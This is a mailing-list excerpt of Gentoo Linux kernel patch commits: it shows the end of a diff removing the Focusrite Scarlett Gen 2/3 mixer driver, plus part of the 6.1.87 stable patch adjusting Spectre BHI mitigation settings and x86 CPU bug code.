+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int i;
+-
+-	/* if line_out_hw_vol is 0, there are no controls to update */
+-	if (!info->line_out_hw_vol)
+-		return;
+-
+-	private->vol_updated = 1;
+-
+-	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-		       &private->master_vol_ctl->id);
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->vol_ctls[i]->id);
+-}
+-
+-/* Notify on dim/mute change */
+-static void scarlett2_notify_dim_mute(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int i;
+-
+-	private->vol_updated = 1;
+-
+-	if (!info->line_out_hw_vol)
+-		return;
+-
+-	for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->dim_mute_ctls[i]->id);
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->mute_ctls[i]->id);
+-}
+-
+-/* Notify on "input other" change (level/pad/air) */
+-static void scarlett2_notify_input_other(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int i;
+-
+-	private->input_other_updated = 1;
+-
+-	for (i = 0; i < info->level_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->level_ctls[i]->id);
+-	for (i = 0; i < info->pad_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->pad_ctls[i]->id);
+-	for (i = 0; i < info->air_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->air_ctls[i]->id);
+-	for (i = 0; i < info->phantom_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->phantom_ctls[i]->id);
+-}
+-
+-/* Notify on "monitor other" change (direct monitor, speaker
+- * switching, talkback)
+- */
+-static void scarlett2_notify_monitor_other(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	private->monitor_other_updated = 1;
+-
+-	if (info->direct_monitor) {
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->direct_monitor_ctl->id);
+-		return;
+-	}
+-
+-	if (info->has_speaker_switching)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->speaker_switching_ctl->id);
+-
+-	if (info->has_talkback)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->talkback_ctl->id);
+-
+-	/* if speaker switching was recently enabled or disabled,
+-	 * invalidate the dim/mute and mux enum controls
+-	 */
+-	if (private->speaker_switching_switched) {
+-		int i;
+-
+-		scarlett2_notify_dim_mute(mixer);
+-
+-		private->speaker_switching_switched = 0;
+-		private->mux_updated = 1;
+-
+-		for (i = 0; i < private->num_mux_dsts; i++)
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->mux_ctls[i]->id);
+-	}
+-}
+-
+-/* Interrupt callback */
+-static void scarlett2_notify(struct urb *urb)
+-{
+-	struct usb_mixer_interface *mixer = urb->context;
+-	int len = urb->actual_length;
+-	int ustatus = urb->status;
+-	u32 data;
+-
+-	if (ustatus != 0 || len != 8)
+-		goto requeue;
+-
+-	data = le32_to_cpu(*(__le32 *)urb->transfer_buffer);
+-	if (data & SCARLETT2_USB_NOTIFY_SYNC)
+-		scarlett2_notify_sync(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_MONITOR)
+-		scarlett2_notify_monitor(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_DIM_MUTE)
+-		scarlett2_notify_dim_mute(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_INPUT_OTHER)
+-		scarlett2_notify_input_other(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_MONITOR_OTHER)
+-		scarlett2_notify_monitor_other(mixer);
+-
+-requeue:
+-	if (ustatus != -ENOENT &&
+-	    ustatus != -ECONNRESET &&
+-	    ustatus != -ESHUTDOWN) {
+-		urb->dev = mixer->chip->dev;
+-		usb_submit_urb(urb, GFP_ATOMIC);
+-	}
+-}
+-
+-static int scarlett2_init_notify(struct usb_mixer_interface *mixer)
+-{
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_data *private = mixer->private_data;
+-	unsigned int pipe = usb_rcvintpipe(dev, private->bEndpointAddress);
+-	void *transfer_buffer;
+-
+-	if (mixer->urb) {
+-		usb_audio_err(mixer->chip,
+-			      "%s: mixer urb already in use!\n", __func__);
+-		return 0;
+-	}
+-
+-	if (usb_pipe_type_check(dev, pipe))
+-		return -EINVAL;
+-
+-	mixer->urb = usb_alloc_urb(0, GFP_KERNEL);
+-	if (!mixer->urb)
+-		return -ENOMEM;
+-
+-	transfer_buffer = kmalloc(private->wMaxPacketSize, GFP_KERNEL);
+-	if (!transfer_buffer)
+-		return -ENOMEM;
+-
+-	usb_fill_int_urb(mixer->urb, dev, pipe,
+-			 transfer_buffer, private->wMaxPacketSize,
+-			 scarlett2_notify, mixer, private->bInterval);
+-
+-	return usb_submit_urb(mixer->urb, GFP_KERNEL);
+-}
+-
+-static int snd_scarlett_gen2_controls_create(struct usb_mixer_interface *mixer)
+-{
+-	const struct scarlett2_device_info **info = scarlett2_devices;
+-	int err;
+-
+-	/* Find device in scarlett2_devices */
+-	while (*info && (*info)->usb_id != mixer->chip->usb_id)
+-		info++;
+-	if (!*info)
+-		return -EINVAL;
+-
+-	/* Initialise private data */
+-	err = scarlett2_init_private(mixer, *info);
+-	if (err < 0)
+-		return err;
+-
+-	/* Send proprietary USB initialisation sequence */
+-	err = scarlett2_usb_init(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Read volume levels and controls from the interface */
+-	err = scarlett2_read_configs(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the MSD control */
+-	err = scarlett2_add_msd_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* If MSD mode is enabled, don't create any other controls */
+-	if (((struct scarlett2_data *)mixer->private_data)->msd_switch)
+-		return 0;
+-
+-	/* Create the analogue output controls */
+-	err = scarlett2_add_line_out_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the analogue input controls */
+-	err = scarlett2_add_line_in_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the input, output, and mixer mux input selections */
+-	err = scarlett2_add_mux_enums(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the matrix mixer controls */
+-	err = scarlett2_add_mixer_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the level meter controls */
+-	err = scarlett2_add_meter_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the sync control */
+-	err = scarlett2_add_sync_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the direct monitor control */
+-	err = scarlett2_add_direct_monitor_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the speaker switching control */
+-	err = scarlett2_add_speaker_switch_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the talkback controls */
+-	err = scarlett2_add_talkback_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the standalone control */
+-	err = scarlett2_add_standalone_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Set up the interrupt polling */
+-	err = scarlett2_init_notify(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	return 0;
+-}
+-
+-int snd_scarlett_gen2_init(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_usb_audio *chip = mixer->chip;
+-	int err;
+-
+-	/* only use UAC_VERSION_2 */
+-	if (!mixer->protocol)
+-		return 0;
+-
+-	if (!(chip->setup & SCARLETT2_ENABLE)) {
+-		usb_audio_info(chip,
+-			"Focusrite Scarlett Gen 2/3 Mixer Driver disabled; "
+-			"use options snd_usb_audio vid=0x%04x pid=0x%04x "
+-			"device_setup=1 to enable and report any issues "
+-			"to g@b4.vu",
+-			USB_ID_VENDOR(chip->usb_id),
+-			USB_ID_PRODUCT(chip->usb_id));
+-		return 0;
+-	}
+-
+-	usb_audio_info(chip,
+-		"Focusrite Scarlett Gen 2/3 Mixer Driver enabled pid=0x%04x",
+-		USB_ID_PRODUCT(chip->usb_id));
+-
+-	err = snd_scarlett_gen2_controls_create(mixer);
+-	if (err < 0)
+-		usb_audio_err(mixer->chip,
+-			      "Error initialising Scarlett Mixer Driver: %d",
+-			      err);
+-
+-	return err;
+-}
+diff --git a/sound/usb/mixer_scarlett_gen2.h b/sound/usb/mixer_scarlett_gen2.h
+deleted file mode 100644
+index 668c6b0cb50a6..0000000000000
+--- a/sound/usb/mixer_scarlett_gen2.h
++++ /dev/null
+@@ -1,7 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __USB_MIXER_SCARLETT_GEN2_H
+-#define __USB_MIXER_SCARLETT_GEN2_H
+-
+-int snd_scarlett_gen2_init(struct usb_mixer_interface *mixer);
+-
+-#endif /* __USB_MIXER_SCARLETT_GEN2_H */
+diff --git a/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc b/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
+index b1ede62498667..b7c8f29c09a97 100644
+--- a/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
++++ b/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
+@@ -18,7 +18,7 @@ echo 'sched:*' > set_event
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -lt 3 ]; then
+     fail "at least fork, exec and exit events should be recorded"
+ fi
+@@ -29,7 +29,7 @@ echo 1 > events/sched/enable
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -lt 3 ]; then
+     fail "at least fork, exec and exit events should be recorded"
+ fi
+@@ -40,7 +40,7 @@ echo 0 > events/sched/enable
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -ne 0 ]; then
+     fail "any of scheduler events should not be recorded"
+ fi


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-18  3:05 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2024-04-18  3:05 UTC (permalink / raw
  To: gentoo-commits

commit:     93c626a5c38a14ed6cf7becf888c1dc582cdca9c
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 18 03:05:18 2024 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 18 03:05:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=93c626a5

Linux patch 6.1.87

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1086_linux-6.1.87.patch | 2733 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2737 insertions(+)

diff --git a/0000_README b/0000_README
index d1148845..b5d4486e 100644
--- a/0000_README
+++ b/0000_README
@@ -387,6 +387,10 @@ Patch:  1085_linux-6.1.86.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.86
 
+Patch:  1086_linux-6.1.87.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.87
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1086_linux-6.1.87.patch b/1086_linux-6.1.87.patch
new file mode 100644
index 00000000..ec06f7c5
--- /dev/null
+++ b/1086_linux-6.1.87.patch
@@ -0,0 +1,2733 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index 9edb2860a3e19..e0a1be97fa759 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -439,12 +439,12 @@ The possible values in this file are:
+    - System is protected by retpoline
+  * - BHI: BHI_DIS_S
+    - System is protected by BHI_DIS_S
+- * - BHI: SW loop; KVM SW loop
++ * - BHI: SW loop, KVM SW loop
+    - System is protected by software clearing sequence
+- * - BHI: Syscall hardening
+-   - Syscalls are hardened against BHI
+- * - BHI: Syscall hardening; KVM: SW loop
+-   - System is protected from userspace attacks by syscall hardening; KVM is protected by software clearing sequence
++ * - BHI: Vulnerable
++   - System is vulnerable to BHI
++ * - BHI: Vulnerable, KVM: SW loop
++   - System is vulnerable; KVM is protected by software clearing sequence
+ 
+ Full mitigation might require a microcode update from the CPU
+ vendor. When the necessary microcode is not available, the kernel will
+@@ -661,18 +661,14 @@ kernel command line.
+ 	spectre_bhi=
+ 
+ 		[X86] Control mitigation of Branch History Injection
+-		(BHI) vulnerability. Syscalls are hardened against BHI
+-		regardless of this setting. This setting affects the deployment
++		(BHI) vulnerability.  This setting affects the deployment
+ 		of the HW BHI control and the SW BHB clearing sequence.
+ 
+ 		on
+-			unconditionally enable.
++			(default) Enable the HW or SW mitigation as
++			needed.
+ 		off
+-			unconditionally disable.
+-		auto
+-			enable if hardware mitigation
+-			control(BHI_DIS_S) is available, otherwise
+-			enable alternate mitigation in KVM.
++			Disable the mitigation.
+ 
+ For spectre_v2_user see Documentation/admin-guide/kernel-parameters.txt
+ 
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index b2c7b2f012e90..aebbe2981241a 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -3283,6 +3283,7 @@
+ 					       reg_file_data_sampling=off [X86]
+ 					       retbleed=off [X86]
+ 					       spec_store_bypass_disable=off [X86,PPC]
++					       spectre_bhi=off [X86]
+ 					       spectre_v2_user=off [X86]
+ 					       srbds=off [X86,INTEL]
+ 					       ssbd=force-off [ARM64]
+@@ -5734,16 +5735,13 @@
+ 			See Documentation/admin-guide/laptops/sonypi.rst
+ 
+ 	spectre_bhi=	[X86] Control mitigation of Branch History Injection
+-			(BHI) vulnerability. Syscalls are hardened against BHI
+-			reglardless of this setting. This setting affects the
++			(BHI) vulnerability.  This setting affects the
+ 			deployment of the HW BHI control and the SW BHB
+ 			clearing sequence.
+ 
+-			on   - unconditionally enable.
+-			off  - unconditionally disable.
+-			auto - (default) enable hardware mitigation
+-			       (BHI_DIS_S) if available, otherwise enable
+-			       alternate mitigation in KVM.
++			on   - (default) Enable the HW or SW mitigation
++			       as needed.
++			off  - Disable the mitigation.
+ 
+ 	spectre_v2=	[X86] Control mitigation of Spectre variant 2
+ 			(indirect branch speculation) vulnerability.
+diff --git a/Makefile b/Makefile
+index baddd8ed81868..e46a57006a34f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 86
++SUBLEVEL = 87
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
+index 10370d1a6c6de..dbb298b907c1c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
+@@ -38,8 +38,8 @@ usdhc1: mmc@5b010000 {
+ 		interrupts = <GIC_SPI 232 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b010000 0x10000>;
+ 		clocks = <&sdhc0_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc0_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc0_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc0_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc0_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_0>;
+ 		status = "disabled";
+@@ -49,8 +49,8 @@ usdhc2: mmc@5b020000 {
+ 		interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b020000 0x10000>;
+ 		clocks = <&sdhc1_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc1_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc1_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc1_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc1_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_1>;
+ 		fsl,tuning-start-tap = <20>;
+@@ -62,8 +62,8 @@ usdhc3: mmc@5b030000 {
+ 		interrupts = <GIC_SPI 234 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b030000 0x10000>;
+ 		clocks = <&sdhc2_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc2_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc2_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc2_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc2_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_2>;
+ 		status = "disabled";
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index ba815ac474a1b..5f7a86f240db7 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2563,31 +2563,16 @@ config MITIGATION_RFDS
+ 	  stored in floating point, vector and integer registers.
+ 	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
+ 
+-choice
+-	prompt "Clear branch history"
++config MITIGATION_SPECTRE_BHI
++	bool "Mitigate Spectre-BHB (Branch History Injection)"
+ 	depends on CPU_SUP_INTEL
+-	default SPECTRE_BHI_ON
++	default y
+ 	help
+ 	  Enable BHI mitigations. BHI attacks are a form of Spectre V2 attacks
+ 	  where the branch history buffer is poisoned to speculatively steer
+ 	  indirect branches.
+ 	  See <file:Documentation/admin-guide/hw-vuln/spectre.rst>
+ 
+-config SPECTRE_BHI_ON
+-	bool "on"
+-	help
+-	  Equivalent to setting spectre_bhi=on command line parameter.
+-config SPECTRE_BHI_OFF
+-	bool "off"
+-	help
+-	  Equivalent to setting spectre_bhi=off command line parameter.
+-config SPECTRE_BHI_AUTO
+-	bool "auto"
+-	help
+-	  Equivalent to setting spectre_bhi=auto command line parameter.
+-
+-endchoice
+-
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index 30fb4931d3871..1394312b732a3 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -1644,6 +1644,7 @@ static void x86_pmu_del(struct perf_event *event, int flags)
+ 	while (++i < cpuc->n_events) {
+ 		cpuc->event_list[i-1] = cpuc->event_list[i];
+ 		cpuc->event_constraint[i-1] = cpuc->event_constraint[i];
++		cpuc->assign[i-1] = cpuc->assign[i];
+ 	}
+ 	cpuc->event_constraint[i-1] = NULL;
+ 	--cpuc->n_events;
+diff --git a/arch/x86/include/asm/apic.h b/arch/x86/include/asm/apic.h
+index 3216da7074bad..36ceecd40fd93 100644
+--- a/arch/x86/include/asm/apic.h
++++ b/arch/x86/include/asm/apic.h
+@@ -12,6 +12,7 @@
+ #include <asm/mpspec.h>
+ #include <asm/msr.h>
+ #include <asm/hardirq.h>
++#include <asm/io.h>
+ 
+ #define ARCH_APICTIMER_STOPS_ON_C3	1
+ 
+@@ -109,7 +110,7 @@ static inline void native_apic_mem_write(u32 reg, u32 v)
+ 
+ static inline u32 native_apic_mem_read(u32 reg)
+ {
+-	return *((volatile u32 *)(APIC_BASE + reg));
++	return readl((void __iomem *)(APIC_BASE + reg));
+ }
+ 
+ extern void native_apic_wait_icr_idle(void);
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 7705571100518..e1672cc77c65f 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -1760,11 +1760,11 @@ static int x2apic_state;
+ 
+ static bool x2apic_hw_locked(void)
+ {
+-	u64 ia32_cap;
++	u64 x86_arch_cap_msr;
+ 	u64 msr;
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if (ia32_cap & ARCH_CAP_XAPIC_DISABLE) {
++	x86_arch_cap_msr = x86_read_arch_cap_msr();
++	if (x86_arch_cap_msr & ARCH_CAP_XAPIC_DISABLE) {
+ 		rdmsrl(MSR_IA32_XAPIC_DISABLE_STATUS, msr);
+ 		return (msr & LEGACY_XAPIC_DISABLED);
+ 	}
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 96bd3ee83a484..6d69123de3660 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -60,6 +60,8 @@ EXPORT_SYMBOL_GPL(x86_spec_ctrl_current);
+ u64 x86_pred_cmd __ro_after_init = PRED_CMD_IBPB;
+ EXPORT_SYMBOL_GPL(x86_pred_cmd);
+ 
++static u64 __ro_after_init x86_arch_cap_msr;
++
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
+ void (*x86_return_thunk)(void) __ro_after_init = &__x86_return_thunk;
+@@ -143,6 +145,8 @@ void __init cpu_select_mitigations(void)
+ 		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
+ 	}
+ 
++	x86_arch_cap_msr = x86_read_arch_cap_msr();
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -300,8 +304,6 @@ static const char * const taa_strings[] = {
+ 
+ static void __init taa_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_TAA)) {
+ 		taa_mitigation = TAA_MITIGATION_OFF;
+ 		return;
+@@ -340,9 +342,8 @@ static void __init taa_select_mitigation(void)
+ 	 * On MDS_NO=1 CPUs if ARCH_CAP_TSX_CTRL_MSR is not set, microcode
+ 	 * update is required.
+ 	 */
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if ( (ia32_cap & ARCH_CAP_MDS_NO) &&
+-	    !(ia32_cap & ARCH_CAP_TSX_CTRL_MSR))
++	if ( (x86_arch_cap_msr & ARCH_CAP_MDS_NO) &&
++	    !(x86_arch_cap_msr & ARCH_CAP_TSX_CTRL_MSR))
+ 		taa_mitigation = TAA_MITIGATION_UCODE_NEEDED;
+ 
+ 	/*
+@@ -400,8 +401,6 @@ static const char * const mmio_strings[] = {
+ 
+ static void __init mmio_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA) ||
+ 	     boot_cpu_has_bug(X86_BUG_MMIO_UNKNOWN) ||
+ 	     cpu_mitigations_off()) {
+@@ -412,8 +411,6 @@ static void __init mmio_select_mitigation(void)
+ 	if (mmio_mitigation == MMIO_MITIGATION_OFF)
+ 		return;
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
+-
+ 	/*
+ 	 * Enable CPU buffer clear mitigation for host and VMM, if also affected
+ 	 * by MDS or TAA. Otherwise, enable mitigation for VMM only.
+@@ -436,7 +433,7 @@ static void __init mmio_select_mitigation(void)
+ 	 * be propagated to uncore buffers, clearing the Fill buffers on idle
+ 	 * is required irrespective of SMT state.
+ 	 */
+-	if (!(ia32_cap & ARCH_CAP_FBSDP_NO))
++	if (!(x86_arch_cap_msr & ARCH_CAP_FBSDP_NO))
+ 		static_branch_enable(&mds_idle_clear);
+ 
+ 	/*
+@@ -446,10 +443,10 @@ static void __init mmio_select_mitigation(void)
+ 	 * FB_CLEAR or by the presence of both MD_CLEAR and L1D_FLUSH on MDS
+ 	 * affected systems.
+ 	 */
+-	if ((ia32_cap & ARCH_CAP_FB_CLEAR) ||
++	if ((x86_arch_cap_msr & ARCH_CAP_FB_CLEAR) ||
+ 	    (boot_cpu_has(X86_FEATURE_MD_CLEAR) &&
+ 	     boot_cpu_has(X86_FEATURE_FLUSH_L1D) &&
+-	     !(ia32_cap & ARCH_CAP_MDS_NO)))
++	     !(x86_arch_cap_msr & ARCH_CAP_MDS_NO)))
+ 		mmio_mitigation = MMIO_MITIGATION_VERW;
+ 	else
+ 		mmio_mitigation = MMIO_MITIGATION_UCODE_NEEDED;
+@@ -507,7 +504,7 @@ static void __init rfds_select_mitigation(void)
+ 	if (rfds_mitigation == RFDS_MITIGATION_OFF)
+ 		return;
+ 
+-	if (x86_read_arch_cap_msr() & ARCH_CAP_RFDS_CLEAR)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_CLEAR)
+ 		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 	else
+ 		rfds_mitigation = RFDS_MITIGATION_UCODE_NEEDED;
+@@ -658,8 +655,6 @@ void update_srbds_msr(void)
+ 
+ static void __init srbds_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_SRBDS))
+ 		return;
+ 
+@@ -668,8 +663,7 @@ static void __init srbds_select_mitigation(void)
+ 	 * are only exposed to SRBDS when TSX is enabled or when CPU is affected
+ 	 * by Processor MMIO Stale Data vulnerability.
+ 	 */
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if ((ia32_cap & ARCH_CAP_MDS_NO) && !boot_cpu_has(X86_FEATURE_RTM) &&
++	if ((x86_arch_cap_msr & ARCH_CAP_MDS_NO) && !boot_cpu_has(X86_FEATURE_RTM) &&
+ 	    !boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA))
+ 		srbds_mitigation = SRBDS_MITIGATION_TSX_OFF;
+ 	else if (boot_cpu_has(X86_FEATURE_HYPERVISOR))
+@@ -812,7 +806,7 @@ static void __init gds_select_mitigation(void)
+ 	/* Will verify below that mitigation _can_ be disabled */
+ 
+ 	/* No microcode */
+-	if (!(x86_read_arch_cap_msr() & ARCH_CAP_GDS_CTRL)) {
++	if (!(x86_arch_cap_msr & ARCH_CAP_GDS_CTRL)) {
+ 		if (gds_mitigation == GDS_MITIGATION_FORCE) {
+ 			/*
+ 			 * This only needs to be done on the boot CPU so do it
+@@ -1521,20 +1515,25 @@ static enum spectre_v2_mitigation __init spectre_v2_select_retpoline(void)
+ 	return SPECTRE_V2_RETPOLINE;
+ }
+ 
++static bool __ro_after_init rrsba_disabled;
++
+ /* Disable in-kernel use of non-RSB RET predictors */
+ static void __init spec_ctrl_disable_kernel_rrsba(void)
+ {
+-	u64 ia32_cap;
++	if (rrsba_disabled)
++		return;
+ 
+-	if (!boot_cpu_has(X86_FEATURE_RRSBA_CTRL))
++	if (!(x86_arch_cap_msr & ARCH_CAP_RRSBA)) {
++		rrsba_disabled = true;
+ 		return;
++	}
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
++	if (!boot_cpu_has(X86_FEATURE_RRSBA_CTRL))
++		return;
+ 
+-	if (ia32_cap & ARCH_CAP_RRSBA) {
+-		x86_spec_ctrl_base |= SPEC_CTRL_RRSBA_DIS_S;
+-		update_spec_ctrl(x86_spec_ctrl_base);
+-	}
++	x86_spec_ctrl_base |= SPEC_CTRL_RRSBA_DIS_S;
++	update_spec_ctrl(x86_spec_ctrl_base);
++	rrsba_disabled = true;
+ }
+ 
+ static void __init spectre_v2_determine_rsb_fill_type_at_vmexit(enum spectre_v2_mitigation mode)
+@@ -1603,13 +1602,10 @@ static bool __init spec_ctrl_bhi_dis(void)
+ enum bhi_mitigations {
+ 	BHI_MITIGATION_OFF,
+ 	BHI_MITIGATION_ON,
+-	BHI_MITIGATION_AUTO,
+ };
+ 
+ static enum bhi_mitigations bhi_mitigation __ro_after_init =
+-	IS_ENABLED(CONFIG_SPECTRE_BHI_ON)  ? BHI_MITIGATION_ON  :
+-	IS_ENABLED(CONFIG_SPECTRE_BHI_OFF) ? BHI_MITIGATION_OFF :
+-					     BHI_MITIGATION_AUTO;
